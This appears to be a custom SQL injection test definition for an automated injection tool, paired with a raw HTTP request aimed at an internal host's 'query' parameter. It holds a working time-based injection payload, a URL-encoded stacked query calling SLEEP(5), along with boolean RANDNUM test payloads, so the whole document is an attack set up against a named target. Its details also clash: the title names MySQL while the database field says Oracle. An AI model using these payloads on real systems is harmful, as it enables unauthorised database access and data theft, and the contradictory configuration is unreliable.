Advanced SQL Injection- MySQL > 5.0.11 stacked queries (SELECT - comment) <t

1. Advanced SQL Injection- MySQL > 5.0.11 stacked queries (SELECT - comment)
2.  
3. <test>
4. <title>CUSTOM1</title>
5. <stype>1</stype>
6. <level>1</level>
7. <risk>1</risk>
8. <clause>0</clause>
9. <where>3</where>
10. <vector>query%29%3B%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29bRCx%29%23</vector>
11. <request>
12. <payload>AND [RANDNUM]=[RANDNUM]</payload>
13. </request>
14. <response>
15. <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
16. </response>
17. <details>
18. <dbms>Oracle</dbms>
19. </details>
20. </test>
21.  
22. GET http://test-agspr-as/Atti/zkau/web/_zv2014110516/js/zul.lang.wpd?query=query HTTP/1.1
23. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
24. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
25. Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
26. DNT: 1
27. Connection: keep-alive
28. Cookie: COOKIES
29. Upgrade-Insecure-Requests: 1
30. Host: test-agspr-as